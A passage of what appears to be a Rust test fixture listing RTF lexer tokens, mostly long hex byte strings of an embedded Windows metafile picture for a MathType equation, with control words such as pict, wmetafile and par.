30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 30 35 30 30 30 30 30 35 30 30 30 30 30 30 30 64 30 30 30 30 30 30 34 64 34 35 35 34 34 31 34 36 34 39 34 63 34 35 35 30 34 39 34 33 35 34 30 30 33 34 32 31 30 30 30 30 33 35 66 65 66 66 66 66 39 32 30 31 30 30 30 30 30 38 30 30 33 34 32 31 63 62 30 31 30 30 30 30 30 31 30 30 30 39 30 30 30 30 30 33 63 35 30 30 30 30 30 30 30 32 30 30 31 63 30 30 30 30 30 30 30 30 30 30 30 35 30 30 30 30 30 30 30 39 30 32 30 30 30 30 30 30 30 30 30 35 30 30 30 30 30 30 30 32 30 31 30 31 30 30 30 30 30 30 30 35 30 30 30 30 30 30 30 31 30 32 66 66 66 66 66 66 30 30 30 35 30 30 30 30 30 30 32 65 30 31 31 38 30 30 30 30 30 30 30 35 30 30 30 30 30 30 30 62 30 32 30 30 30 30 30 30 30 30 30 35 30 30 30 30 30 30 30 63 30 32 61 30 30 31 32 30 31 65 31 32 30 30 30 30 30 30 32 36 30 36 30 66 30 30 31 61 30 30 66 66 66 66 66 66 66 66 30 30 30 30 31 30 30 30 30 30 30 30 63 30 66 66 66 66 66 66 63 36 66 66 66 66 66 66 65 30 31 64 30 30 30 30 36 36 30 31 30 30 30 30 30 62 30 30 30 30 30 30 32 36 30 36 30 66 30 30 30 63 30 30 34 64 36 31 37 34 36 38 35 34 37 39 37 30 36 35 30 30 30 30 32 30 30 30 31 63 30 30 30 30 30 30 66 62 30 32 38 30 66 65 30 30 30 30 30 30 30 30 30 30 30 30 39 30 30 31 30 30 30 30 30 30 30 30 30 34 30 32 30 30 31 30 35 34 36 39 36 64 36 35 37 33 32 30 34 65 36 35 37 37 32 30 35 32 36 66 36 64 36 31 36 65 30 30 66 65 66 66 66 66 66 66 36 62 32 63 30 61 30 37 30 30 30 30 30 61 30 30 30 30 30 30 30 30 30 30 30 34 30 30 30 30 30 30 32 64 30 31 30 30 30 30 30 63 30 30 30 30 30 30 33 32 30 61 36 30 30 31 39 30 31 36 30 61 30 30 30 30 30 30 33 31 33 31 33 31 33 31 33 31 33 31 33 31 33 31 33 31 33 31 30 63 30 30 30 30 30 30 33 32 30 61 36 30 30 31 31 30 30 66 30 61 30 30 30 30 30 30 33 31 33 31 33 31 33 31 33 31 33 31 33 31 33 31 33 31 33 31 30 63 30 30 30 30 30 30 33 32 30 61 36 30 30 31 39 30 30 37 30 61 30 30 30 30 30 30 33 31 33 31 33 31 33 31 33 31 33 31 33 31 33 31 33 31 33 31 30 63 30 30 30 30 30 30 33 32 30 61 36 30 30 31 31 30 30 30 30 61 30 30 30 30 30 30 33 31 33 31 33 31 33 31 33 31 33 31 33 31 33 31 33 31 33 31 30 61 30 30 30 30 30 30 32 36 30 36 30 66 30 30 30 61 30 30 66 66 66 66 66 66 66 66 30 31 30 30 30 30 30 30 30 30 30 30 31 63 30 30 30 30 30 30 66 62 30 32 31 30 30 30 30 37 30 30 30 30 30 30 30 30 30 30 62 63 30 32 30 30 30 30 30 30 30 30 30 31 30 32 30 32 32 32 35 33 37 39 37 33 37 34 36 35 36 64 30 30 30 30 34 38 30 30 38 61 30 31 30 30 30 30 30 61 30 30 30 36 30 30 30 30 30 30 34 38 30 30 38 61 30 31 66 66 66 66 66 66 66 66 37 63 65 66 31 38 30 30 30 34 30 30 30 30 30 30 32 64 30 31 30 31 30 30 30 34 30 30 30 30 30 30 66 30 30 31 30 30 30 30 30 33 30 30 30 30 30 30 30 30 30 30),
    Token::Newline,
    Token::EndGroup,
    Token::StartGroup,
    Token::ControlWord(result),
    Token::StartGroup,
    Token::ControlWord(pict),
    Token::StartGroup,
    Token::ControlSymbol(*),
    Token::ControlWord(picprop),
    Token::EndGroup,
    Token::ControlWord(wmetafile:8),
    Token::ControlWord(picw:380),
    Token::ControlWord(pich:260),
    Token::ControlWord(picwgoal:380),
    Token::ControlWord(pichgoal:260),
    Token::Newline,
    Token::Text( 30 31 30 30 30 39 30 30 30 30 30 33 39 65 30 30 30 30 30 30 30 32 30 30 31 63 30 30 30 30 30 30 30 30 30 30 30 35 30 30 30 30 30 30 30 39 30 32 30 30 30 30 30 30 30 30 30 35 30 30 30 30 30 30 30 32 30 31 30 31 30 30 30 30 30 30 30 35),
    Token::Newline,
    Token::Text( 30 30 30 30 30 30 30 31 30 32 66 66 66 66 66 66 30 30 30 35 30 30 30 30 30 30 32 65 30 31 31 38 30 30 30 30 30 30 30 35 30 30 30 30 30 30 30 62 30 32 30 30 30 30 30 30 30 30 30 35 30 30 30 30 30 30 30 63 30 32 61 30 30 31 36 30 30 32),
    Token::Newline,
    Token::Text( 31 32 30 30 30 30 30 30 32 36 30 36 30 66 30 30 31 61 30 30 66 66 66 66 66 66 66 66 30 30 30 30 31 30 30 30 30 30 30 30 63 30 66 66 66 66 66 66 63 36 66 66 66 66 66 66 32 30 30 32 30 30 30 30 36 36 30 31 30 30 30 30 30 62 30 30 30 30),
    Token::Newline,
    Token::Text( 30 30 32 36 30 36 30 66 30 30 30 63 30 30 34 64 36 31 37 34 36 38 35 34 37 39 37 30 36 35 30 30 30 30 32 30 30 30 31 63 30 30 30 30 30 30 66 62 30 32 38 30 66 65 30 30 30 30 30 30 30 30 30 30 30 30 39 30 30 31 30 30 30 30 30 30 30 30),
    Token::Newline,
    Token::Text( 30 34 30 32 30 30 31 30 35 34 36 39 36 64 36 35 37 33 32 30 34 65 36 35 37 37 32 30 35 32 36 66 36 64 36 31 36 65 30 30 66 65 66 66 66 66 66 66 35 66 32 64 30 61 36 35 30 30 30 30 30 61 30 30 30 30 30 30 30 30 30 30 30 34 30 30 30 30),
    Token::Newline,
    Token::Text( 30 30 32 64 30 31 30 30 30 30 30 39 30 30 30 30 30 30 33 32 30 61 36 30 30 31 31 30 30 30 30 33 30 30 30 30 30 30 33 31 33 31 33 31 30 30 30 61 30 30 30 30 30 30 32 36 30 36 30 66 30 30 30 61 30 30 66 66 66 66 66 66 66 66 30 31 30 30),
    Token::Newline,
    Token::Text( 30 30 30 30 30 30 30 30 31 63 30 30 30 30 30 30 66 62 30 32 31 30 30 30 30 37 30 30 30 30 30 30 30 30 30 30 62 63 30 32 30 30 30 30 30 30 30 30 30 31 30 32 30 32 32 32 35 33 37 39 37 33 37 34 36 35 36 64 30 30 30 30 34 38 30 30 38 61),
    Token::Newline,
    Token::Text( 30 31 30 30 30 30 30 61 30 30 30 36 30 30 30 30 30 30 34 38 30 30 38 61 30 31 66 66 66 66 66 66 66 66 36 63 65 32 31 38 30 30 30 34 30 30 30 30 30 30 32 64 30 31 30 31 30 30 30 34 30 30 30 30 30 30 66 30 30 31 30 30 30 30 30 33 30 30),
    Token::Newline,
    Token::Text( 30 30 30 30 30 30 30 30),
    Token::Newline,
    Token::EndGroup,
    Token::EndGroup,
    Token::EndGroup,
    Token::Newline,
    Token::ControlWord(par),
    Token::EndGroup,
    Token::Newline,
]

